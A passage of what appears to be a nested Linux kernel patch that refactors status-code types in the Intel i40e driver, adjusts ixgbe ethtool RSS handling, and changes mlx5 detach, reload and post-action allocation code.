+ 		      u32 track_id);
+-enum i40e_status_code
++int
+ i40e_add_pinfo_to_list(struct i40e_hw *hw,
+ 		       struct i40e_profile_segment *profile,
+ 		       u8 *profile_info_sec, u32 track_id);
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_status.h b/drivers/net/ethernet/intel/i40e/i40e_status.h
+index db3714a65dc71..4d2782e76038b 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_status.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_status.h
+@@ -9,65 +9,30 @@ enum i40e_status_code {
+ 	I40E_SUCCESS				= 0,
+ 	I40E_ERR_NVM				= -1,
+ 	I40E_ERR_NVM_CHECKSUM			= -2,
+-	I40E_ERR_PHY				= -3,
+ 	I40E_ERR_CONFIG				= -4,
+ 	I40E_ERR_PARAM				= -5,
+-	I40E_ERR_MAC_TYPE			= -6,
+ 	I40E_ERR_UNKNOWN_PHY			= -7,
+-	I40E_ERR_LINK_SETUP			= -8,
+-	I40E_ERR_ADAPTER_STOPPED		= -9,
+ 	I40E_ERR_INVALID_MAC_ADDR		= -10,
+ 	I40E_ERR_DEVICE_NOT_SUPPORTED		= -11,
+-	I40E_ERR_PRIMARY_REQUESTS_PENDING	= -12,
+-	I40E_ERR_INVALID_LINK_SETTINGS		= -13,
+-	I40E_ERR_AUTONEG_NOT_COMPLETE		= -14,
+ 	I40E_ERR_RESET_FAILED			= -15,
+-	I40E_ERR_SWFW_SYNC			= -16,
+ 	I40E_ERR_NO_AVAILABLE_VSI		= -17,
+ 	I40E_ERR_NO_MEMORY			= -18,
+ 	I40E_ERR_BAD_PTR			= -19,
+-	I40E_ERR_RING_FULL			= -20,
+-	I40E_ERR_INVALID_PD_ID			= -21,
+-	I40E_ERR_INVALID_QP_ID			= -22,
+-	I40E_ERR_INVALID_CQ_ID			= -23,
+-	I40E_ERR_INVALID_CEQ_ID			= -24,
+-	I40E_ERR_INVALID_AEQ_ID			= -25,
+ 	I40E_ERR_INVALID_SIZE			= -26,
+-	I40E_ERR_INVALID_ARP_INDEX		= -27,
+-	I40E_ERR_INVALID_FPM_FUNC_ID		= -28,
+-	I40E_ERR_QP_INVALID_MSG_SIZE		= -29,
+-	I40E_ERR_QP_TOOMANY_WRS_POSTED		= -30,
+-	I40E_ERR_INVALID_FRAG_COUNT		= -31,
+ 	I40E_ERR_QUEUE_EMPTY			= -32,
+-	I40E_ERR_INVALID_ALIGNMENT		= -33,
+-	I40E_ERR_FLUSHED_QUEUE			= -34,
+-	I40E_ERR_INVALID_PUSH_PAGE_INDEX	= -35,
+-	I40E_ERR_INVALID_IMM_DATA_SIZE		= -36,
+ 	I40E_ERR_TIMEOUT			= -37,
+-	I40E_ERR_OPCODE_MISMATCH		= -38,
+-	I40E_ERR_CQP_COMPL_ERROR		= -39,
+-	I40E_ERR_INVALID_VF_ID			= -40,
+-	I40E_ERR_INVALID_HMCFN_ID		= -41,
+-	I40E_ERR_BACKING_PAGE_ERROR		= -42,
+-	I40E_ERR_NO_PBLCHUNKS_AVAILABLE		= -43,
+-	I40E_ERR_INVALID_PBLE_INDEX		= -44,
+ 	I40E_ERR_INVALID_SD_INDEX		= -45,
+ 	I40E_ERR_INVALID_PAGE_DESC_INDEX	= -46,
+ 	I40E_ERR_INVALID_SD_TYPE		= -47,
+-	I40E_ERR_MEMCPY_FAILED			= -48,
+ 	I40E_ERR_INVALID_HMC_OBJ_INDEX		= -49,
+ 	I40E_ERR_INVALID_HMC_OBJ_COUNT		= -50,
+-	I40E_ERR_INVALID_SRQ_ARM_LIMIT		= -51,
+-	I40E_ERR_SRQ_ENABLED			= -52,
+ 	I40E_ERR_ADMIN_QUEUE_ERROR		= -53,
+ 	I40E_ERR_ADMIN_QUEUE_TIMEOUT		= -54,
+ 	I40E_ERR_BUF_TOO_SHORT			= -55,
+ 	I40E_ERR_ADMIN_QUEUE_FULL		= -56,
+ 	I40E_ERR_ADMIN_QUEUE_NO_WORK		= -57,
+-	I40E_ERR_BAD_IWARP_CQE			= -58,
+ 	I40E_ERR_NVM_BLANK_MODE			= -59,
+ 	I40E_ERR_NOT_IMPLEMENTED		= -60,
+-	I40E_ERR_PE_DOORBELL_NOT_ENABLED	= -61,
+ 	I40E_ERR_DIAG_TEST_FAILED		= -62,
+ 	I40E_ERR_NOT_READY			= -63,
+ 	I40E_NOT_SUPPORTED			= -64,
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+index 635f93d603186..cb7cf672f6971 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+@@ -17,7 +17,7 @@
+  **/
+ static void i40e_vc_vf_broadcast(struct i40e_pf *pf,
+ 				 enum virtchnl_ops v_opcode,
+-				 i40e_status v_retval, u8 *msg,
++				 int v_retval, u8 *msg,
+ 				 u16 msglen)
+ {
+ 	struct i40e_hw *hw = &pf->hw;
+@@ -1246,13 +1246,13 @@ err:
+  * @vl: List of VLANs - apply filter for given VLANs
+  * @num_vlans: Number of elements in @vl
+  **/
+-static i40e_status
++static int
+ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+ 		     bool unicast_enable, s16 *vl, u16 num_vlans)
+ {
+-	i40e_status aq_ret, aq_tmp = 0;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_hw *hw = &pf->hw;
++	int aq_ret, aq_tmp = 0;
+ 	int i;
+ 
+ 	/* No VLAN to set promisc on, set on VSI */
+@@ -1264,9 +1264,9 @@ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+ 			int aq_err = pf->hw.aq.asq_last_status;
+ 
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d failed to set multicast promiscuous mode err %s aq_err %s\n",
++				"VF %d failed to set multicast promiscuous mode err %d aq_err %s\n",
+ 				vf->vf_id,
+-				i40e_stat_str(&pf->hw, aq_ret),
++				aq_ret,
+ 				i40e_aq_str(&pf->hw, aq_err));
+ 
+ 			return aq_ret;
+@@ -1280,9 +1280,9 @@ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+ 			int aq_err = pf->hw.aq.asq_last_status;
+ 
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d failed to set unicast promiscuous mode err %s aq_err %s\n",
++				"VF %d failed to set unicast promiscuous mode err %d aq_err %s\n",
+ 				vf->vf_id,
+-				i40e_stat_str(&pf->hw, aq_ret),
++				aq_ret,
+ 				i40e_aq_str(&pf->hw, aq_err));
+ 		}
+ 
+@@ -1297,9 +1297,9 @@ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+ 			int aq_err = pf->hw.aq.asq_last_status;
+ 
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d failed to set multicast promiscuous mode err %s aq_err %s\n",
++				"VF %d failed to set multicast promiscuous mode err %d aq_err %s\n",
+ 				vf->vf_id,
+-				i40e_stat_str(&pf->hw, aq_ret),
++				aq_ret,
+ 				i40e_aq_str(&pf->hw, aq_err));
+ 
+ 			if (!aq_tmp)
+@@ -1313,9 +1313,9 @@ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+ 			int aq_err = pf->hw.aq.asq_last_status;
+ 
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d failed to set unicast promiscuous mode err %s aq_err %s\n",
++				"VF %d failed to set unicast promiscuous mode err %d aq_err %s\n",
+ 				vf->vf_id,
+-				i40e_stat_str(&pf->hw, aq_ret),
++				aq_ret,
+ 				i40e_aq_str(&pf->hw, aq_err));
+ 
+ 			if (!aq_tmp)
+@@ -1339,13 +1339,13 @@ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+  * Called from the VF to configure the promiscuous mode of
+  * VF vsis and from the VF reset path to reset promiscuous mode.
+  **/
+-static i40e_status i40e_config_vf_promiscuous_mode(struct i40e_vf *vf,
+-						   u16 vsi_id,
+-						   bool allmulti,
+-						   bool alluni)
++static int i40e_config_vf_promiscuous_mode(struct i40e_vf *vf,
++					   u16 vsi_id,
++					   bool allmulti,
++					   bool alluni)
+ {
+-	i40e_status aq_ret = I40E_SUCCESS;
+ 	struct i40e_pf *pf = vf->pf;
++	int aq_ret = I40E_SUCCESS;
+ 	struct i40e_vsi *vsi;
+ 	u16 num_vlans;
+ 	s16 *vl;
+@@ -1955,7 +1955,7 @@ static int i40e_vc_send_msg_to_vf(struct i40e_vf *vf, u32 v_opcode,
+ 	struct i40e_pf *pf;
+ 	struct i40e_hw *hw;
+ 	int abs_vf_id;
+-	i40e_status aq_ret;
++	int aq_ret;
+ 
+ 	/* validate the request */
+ 	if (!vf || vf->vf_id >= vf->pf->num_alloc_vfs)
+@@ -1987,7 +1987,7 @@ static int i40e_vc_send_msg_to_vf(struct i40e_vf *vf, u32 v_opcode,
+  **/
+ static int i40e_vc_send_resp_to_vf(struct i40e_vf *vf,
+ 				   enum virtchnl_ops opcode,
+-				   i40e_status retval)
++				   int retval)
+ {
+ 	return i40e_vc_send_msg_to_vf(vf, opcode, retval, NULL, 0);
+ }
+@@ -2091,9 +2091,9 @@ static int i40e_vc_get_vf_resources_msg(struct i40e_vf *vf, u8 *msg)
+ {
+ 	struct virtchnl_vf_resource *vfres = NULL;
+ 	struct i40e_pf *pf = vf->pf;
+-	i40e_status aq_ret = 0;
+ 	struct i40e_vsi *vsi;
+ 	int num_vsis = 1;
++	int aq_ret = 0;
+ 	size_t len = 0;
+ 	int ret;
+ 
+@@ -2221,9 +2221,9 @@ static int i40e_vc_config_promiscuous_mode_msg(struct i40e_vf *vf, u8 *msg)
+ 	struct virtchnl_promisc_info *info =
+ 	    (struct virtchnl_promisc_info *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+-	i40e_status aq_ret = 0;
+ 	bool allmulti = false;
+ 	bool alluni = false;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
+@@ -2308,10 +2308,10 @@ static int i40e_vc_config_queues_msg(struct i40e_vf *vf, u8 *msg)
+ 	struct virtchnl_queue_pair_info *qpi;
+ 	u16 vsi_id, vsi_queue_id = 0;
+ 	struct i40e_pf *pf = vf->pf;
+-	i40e_status aq_ret = 0;
+ 	int i, j = 0, idx = 0;
+ 	struct i40e_vsi *vsi;
+ 	u16 num_qps_all = 0;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
+@@ -2458,8 +2458,8 @@ static int i40e_vc_config_irq_map_msg(struct i40e_vf *vf, u8 *msg)
+ 	struct virtchnl_irq_map_info *irqmap_info =
+ 	    (struct virtchnl_irq_map_info *)msg;
+ 	struct virtchnl_vector_map *map;
++	int aq_ret = 0;
+ 	u16 vsi_id;
+-	i40e_status aq_ret = 0;
+ 	int i;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+@@ -2574,7 +2574,7 @@ static int i40e_vc_enable_queues_msg(struct i40e_vf *vf, u8 *msg)
+ 	struct virtchnl_queue_select *vqs =
+ 	    (struct virtchnl_queue_select *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	int i;
+ 
+ 	if (!test_bit(I40E_VF_STATE_ACTIVE, &vf->vf_states)) {
+@@ -2632,7 +2632,7 @@ static int i40e_vc_disable_queues_msg(struct i40e_vf *vf, u8 *msg)
+ 	struct virtchnl_queue_select *vqs =
+ 	    (struct virtchnl_queue_select *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
+@@ -2783,7 +2783,7 @@ static int i40e_vc_get_stats_msg(struct i40e_vf *vf, u8 *msg)
+ 	    (struct virtchnl_queue_select *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_eth_stats stats;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	struct i40e_vsi *vsi;
+ 
+ 	memset(&stats, 0, sizeof(struct i40e_eth_stats));
+@@ -2926,7 +2926,7 @@ static int i40e_vc_add_mac_addr_msg(struct i40e_vf *vf, u8 *msg)
+ 	    (struct virtchnl_ether_addr_list *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+-	i40e_status ret = 0;
++	int ret = 0;
+ 	int i;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE) ||
+@@ -2998,7 +2998,7 @@ static int i40e_vc_del_mac_addr_msg(struct i40e_vf *vf, u8 *msg)
+ 	bool was_unimac_deleted = false;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+-	i40e_status ret = 0;
++	int ret = 0;
+ 	int i;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE) ||
+@@ -3071,7 +3071,7 @@ static int i40e_vc_add_vlan_msg(struct i40e_vf *vf, u8 *msg)
+ 	    (struct virtchnl_vlan_filter_list *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	int i;
+ 
+ 	if ((vf->num_vlan >= I40E_VC_MAX_VLAN_PER_VF) &&
+@@ -3142,7 +3142,7 @@ static int i40e_vc_remove_vlan_msg(struct i40e_vf *vf, u8 *msg)
+ 	    (struct virtchnl_vlan_filter_list *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	int i;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE) ||
+@@ -3198,7 +3198,7 @@ static int i40e_vc_iwarp_msg(struct i40e_vf *vf, u8 *msg, u16 msglen)
+ {
+ 	struct i40e_pf *pf = vf->pf;
+ 	int abs_vf_id = vf->vf_id + pf->hw.func_caps.vf_base_id;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 
+ 	if (!test_bit(I40E_VF_STATE_ACTIVE, &vf->vf_states) ||
+ 	    !test_bit(I40E_VF_STATE_IWARPENA, &vf->vf_states)) {
+@@ -3227,7 +3227,7 @@ static int i40e_vc_iwarp_qvmap_msg(struct i40e_vf *vf, u8 *msg, bool config)
+ {
+ 	struct virtchnl_iwarp_qvlist_info *qvlist_info =
+ 				(struct virtchnl_iwarp_qvlist_info *)msg;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 
+ 	if (!test_bit(I40E_VF_STATE_ACTIVE, &vf->vf_states) ||
+ 	    !test_bit(I40E_VF_STATE_IWARPENA, &vf->vf_states)) {
+@@ -3263,7 +3263,7 @@ static int i40e_vc_config_rss_key(struct i40e_vf *vf, u8 *msg)
+ 		(struct virtchnl_rss_key *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE) ||
+ 	    !i40e_vc_isvalid_vsi_id(vf, vrk->vsi_id) ||
+@@ -3293,7 +3293,7 @@ static int i40e_vc_config_rss_lut(struct i40e_vf *vf, u8 *msg)
+ 		(struct virtchnl_rss_lut *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	u16 i;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE) ||
+@@ -3328,7 +3328,7 @@ static int i40e_vc_get_rss_hena(struct i40e_vf *vf, u8 *msg)
+ {
+ 	struct virtchnl_rss_hena *vrh = NULL;
+ 	struct i40e_pf *pf = vf->pf;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	int len = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+@@ -3365,7 +3365,7 @@ static int i40e_vc_set_rss_hena(struct i40e_vf *vf, u8 *msg)
+ 		(struct virtchnl_rss_hena *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
+@@ -3389,8 +3389,8 @@ err:
+  **/
+ static int i40e_vc_enable_vlan_stripping(struct i40e_vf *vf, u8 *msg)
+ {
+-	i40e_status aq_ret = 0;
+ 	struct i40e_vsi *vsi;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
+@@ -3415,8 +3415,8 @@ err:
+  **/
+ static int i40e_vc_disable_vlan_stripping(struct i40e_vf *vf, u8 *msg)
+ {
+-	i40e_status aq_ret = 0;
+ 	struct i40e_vsi *vsi;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
+@@ -3615,8 +3615,8 @@ static void i40e_del_all_cloud_filters(struct i40e_vf *vf)
+ 			ret = i40e_add_del_cloud_filter(vsi, cfilter, false);
+ 		if (ret)
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d: Failed to delete cloud filter, err %s aq_err %s\n",
+-				vf->vf_id, i40e_stat_str(&pf->hw, ret),
++				"VF %d: Failed to delete cloud filter, err %d aq_err %s\n",
++				vf->vf_id, ret,
+ 				i40e_aq_str(&pf->hw,
+ 					    pf->hw.aq.asq_last_status));
+ 
+@@ -3642,7 +3642,7 @@ static int i40e_vc_del_cloud_filter(struct i40e_vf *vf, u8 *msg)
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+ 	struct hlist_node *node;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	int i, ret;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+@@ -3718,8 +3718,8 @@ static int i40e_vc_del_cloud_filter(struct i40e_vf *vf, u8 *msg)
+ 		ret = i40e_add_del_cloud_filter(vsi, &cfilter, false);
+ 	if (ret) {
+ 		dev_err(&pf->pdev->dev,
+-			"VF %d: Failed to delete cloud filter, err %s aq_err %s\n",
+-			vf->vf_id, i40e_stat_str(&pf->hw, ret),
++			"VF %d: Failed to delete cloud filter, err %d aq_err %s\n",
++			vf->vf_id, ret,
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto err;
+ 	}
+@@ -3773,7 +3773,7 @@ static int i40e_vc_add_cloud_filter(struct i40e_vf *vf, u8 *msg)
+ 	struct i40e_cloud_filter *cfilter = NULL;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	int i, ret;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+@@ -3852,8 +3852,8 @@ static int i40e_vc_add_cloud_filter(struct i40e_vf *vf, u8 *msg)
+ 		ret = i40e_add_del_cloud_filter(vsi, cfilter, true);
+ 	if (ret) {
+ 		dev_err(&pf->pdev->dev,
+-			"VF %d: Failed to add cloud filter, err %s aq_err %s\n",
+-			vf->vf_id, i40e_stat_str(&pf->hw, ret),
++			"VF %d: Failed to add cloud filter, err %d aq_err %s\n",
++			vf->vf_id, ret,
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto err_free;
+ 	}
+@@ -3882,7 +3882,7 @@ static int i40e_vc_add_qch_msg(struct i40e_vf *vf, u8 *msg)
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_link_status *ls = &pf->hw.phy.link_info;
+ 	int i, adq_request_qps = 0;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	u64 speed = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+@@ -3994,7 +3994,7 @@ err:
+ static int i40e_vc_del_qch_msg(struct i40e_vf *vf, u8 *msg)
+ {
+ 	struct i40e_pf *pf = vf->pf;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c
+index e88e3dfac8c21..0051aa676e19e 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c
+@@ -2634,6 +2634,14 @@ static int ixgbe_get_rss_hash_opts(struct ixgbe_adapter *adapter,
+ 	return 0;
+ }
+ 
++static int ixgbe_rss_indir_tbl_max(struct ixgbe_adapter *adapter)
++{
++	if (adapter->hw.mac.type < ixgbe_mac_X550)
++		return 16;
++	else
++		return 64;
++}
++
+ static int ixgbe_get_rxnfc(struct net_device *dev, struct ethtool_rxnfc *cmd,
+ 			   u32 *rule_locs)
+ {
+@@ -2642,7 +2650,8 @@ static int ixgbe_get_rxnfc(struct net_device *dev, struct ethtool_rxnfc *cmd,
+ 
+ 	switch (cmd->cmd) {
+ 	case ETHTOOL_GRXRINGS:
+-		cmd->data = adapter->num_rx_queues;
++		cmd->data = min_t(int, adapter->num_rx_queues,
++				  ixgbe_rss_indir_tbl_max(adapter));
+ 		ret = 0;
+ 		break;
+ 	case ETHTOOL_GRXCLSRLCNT:
+@@ -3044,14 +3053,6 @@ static int ixgbe_set_rxnfc(struct net_device *dev, struct ethtool_rxnfc *cmd)
+ 	return ret;
+ }
+ 
+-static int ixgbe_rss_indir_tbl_max(struct ixgbe_adapter *adapter)
+-{
+-	if (adapter->hw.mac.type < ixgbe_mac_X550)
+-		return 16;
+-	else
+-		return 64;
+-}
+-
+ static u32 ixgbe_get_rxfh_key_size(struct net_device *netdev)
+ {
+ 	return IXGBE_RSS_KEY_SIZE;
+@@ -3100,8 +3101,8 @@ static int ixgbe_set_rxfh(struct net_device *netdev, const u32 *indir,
+ 	int i;
+ 	u32 reta_entries = ixgbe_rss_indir_tbl_entries(adapter);
+ 
+-	if (hfunc)
+-		return -EINVAL;
++	if (hfunc != ETH_RSS_HASH_NO_CHANGE && hfunc != ETH_RSS_HASH_TOP)
++		return -EOPNOTSUPP;
+ 
+ 	/* Fill out the redirection table */
+ 	if (indir) {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/dev.c b/drivers/net/ethernet/mellanox/mlx5/core/dev.c
+index 0571e40c6ee5f..02bb9d43ff9c4 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/dev.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/dev.c
+@@ -396,7 +396,7 @@ int mlx5_attach_device(struct mlx5_core_dev *dev)
+ 	return ret;
+ }
+ 
+-void mlx5_detach_device(struct mlx5_core_dev *dev)
++void mlx5_detach_device(struct mlx5_core_dev *dev, bool suspend)
+ {
+ 	struct mlx5_priv *priv = &dev->priv;
+ 	struct auxiliary_device *adev;
+@@ -426,7 +426,7 @@ void mlx5_detach_device(struct mlx5_core_dev *dev)
+ 
+ 		adrv = to_auxiliary_drv(adev->dev.driver);
+ 
+-		if (adrv->suspend) {
++		if (adrv->suspend && suspend) {
+ 			adrv->suspend(adev, pm);
+ 			continue;
+ 		}
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/devlink.c b/drivers/net/ethernet/mellanox/mlx5/core/devlink.c
+index 97e9ec44a759b..3749eb83d9e53 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/devlink.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/devlink.c
+@@ -108,7 +108,7 @@ static int mlx5_devlink_reload_fw_activate(struct devlink *devlink, struct netli
+ 	if (err)
+ 		return err;
+ 
+-	mlx5_unload_one_devl_locked(dev);
++	mlx5_unload_one_devl_locked(dev, true);
+ 	err = mlx5_health_wait_pci_up(dev);
+ 	if (err)
+ 		NL_SET_ERR_MSG_MOD(extack, "FW activate aborted, PCI reads fail after reset");
+@@ -166,7 +166,7 @@ static int mlx5_devlink_reload_down(struct devlink *devlink, bool netns_change,
+ 
+ 	switch (action) {
+ 	case DEVLINK_RELOAD_ACTION_DRIVER_REINIT:
+-		mlx5_unload_one_devl_locked(dev);
++		mlx5_unload_one_devl_locked(dev, false);
+ 		break;
+ 	case DEVLINK_RELOAD_ACTION_FW_ACTIVATE:
+ 		if (limit == DEVLINK_RELOAD_LIMIT_NO_RESET)
+@@ -200,7 +200,7 @@ static int mlx5_devlink_reload_up(struct devlink *devlink, enum devlink_reload_a
+ 			break;
+ 		/* On fw_activate action, also driver is reloaded and reinit performed */
+ 		*actions_performed |= BIT(DEVLINK_RELOAD_ACTION_DRIVER_REINIT);
+-		ret = mlx5_load_one_devl_locked(dev, false);
++		ret = mlx5_load_one_devl_locked(dev, true);
+ 		break;
+ 	default:
+ 		/* Unsupported action should not get to this function */
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.c
+index 4e48946c4c2ac..0290e0dea5390 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.c
+@@ -106,22 +106,17 @@ err_rule:
+ }
+ 
+ struct mlx5e_post_act_handle *
+-mlx5e_tc_post_act_add(struct mlx5e_post_act *post_act, struct mlx5_flow_attr *attr)
++mlx5e_tc_post_act_add(struct mlx5e_post_act *post_act, struct mlx5_flow_attr *post_attr)
+ {
+-	u32 attr_sz = ns_to_attr_sz(post_act->ns_type);
+ 	struct mlx5e_post_act_handle *handle;
+-	struct mlx5_flow_attr *post_attr;
+ 	int err;
+ 
+ 	handle = kzalloc(sizeof(*handle), GFP_KERNEL);
+-	post_attr = mlx5_alloc_flow_attr(post_act->ns_type);
+-	if (!handle || !post_attr) {
+-		kfree(post_attr);
++	if (!handle) {
+ 		kfree(handle);
+ 		return ERR_PTR(-ENOMEM);
+ 	}
+ 
+-	memcpy(post_attr, attr, attr_sz);
+ 	post_attr->chain = 0;
+ 	post_attr->prio = 0;
+ 	post_attr->ft = post_act->ft;
+@@ -145,7 +140,6 @@ mlx5e_tc_post_act_add(struct mlx5e_post_act *post_act, struct mlx5_flow_attr *at
+ 	return handle;
+ 
+ err_xarray:
+-	kfree(post_attr);
+ 	kfree(handle);
+ 	return ERR_PTR(err);
+ }
+@@ -164,7 +158,6 @@ mlx5e_tc_post_act_del(struct mlx5e_post_act *post_act, struct mlx5e_post_act_han
+ 	if (!IS_ERR_OR_NULL(handle->rule))
+ 		mlx5e_tc_post_act_unoffload(post_act, handle);
+ 	xa_erase(&post_act->ids, handle->id);
+-	kfree(handle->attr);
+ 	kfree(handle);
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.h b/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.h
+index f476774c0b75d..40b8df184af51 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.h
+@@ -19,7 +19,7 @@ void
+ mlx5e_tc_post_act_destroy(struct mlx5e_post_act *post_act);
+ 
+ struct mlx5e_post_act_handle *
+-mlx5e_tc_post_act_add(struct mlx5e_post_act *post_act, struct mlx5_flow_attr *attr);
++mlx5e_tc_post_act_add(struct mlx5e_post_act *post_act, struct mlx5_flow_attr *post_attr);
+ 
+ void
+ mlx5e_tc_post_act_del(struct mlx5e_post_act *post_act, struct mlx5e_post_act_handle *handle);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc/sample.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc/sample.c
+index f2c2c752bd1c3..c57b097275241 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc/sample.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc/sample.c
+@@ -14,10 +14,10 @@
+ 
+ #define MLX5_ESW_VPORT_TBL_SIZE_SAMPLE (64 * 1024)
+ 
+-static const struct esw_vport_tbl_namespace mlx5_esw_vport_tbl_sample_ns = {
++static struct esw_vport_tbl_namespace mlx5_esw_vport_tbl_sample_ns = {
+ 	.max_fte = MLX5_ESW_VPORT_TBL_SIZE_SAMPLE,
+ 	.max_num_groups = 0,    /* default num of groups */
+-	.flags = MLX5_FLOW_TABLE_TUNNEL_EN_REFORMAT | MLX5_FLOW_TABLE_TUNNEL_EN_DECAP,
++	.flags = 0,
+ };
+ 
+ struct mlx5e_tc_psample {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_fs.c b/drivers/net/ethernet/mellanox/mlx5/core/en_fs.c
+index 7cd36f4ac3efc..eba601487eb79 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_fs.c
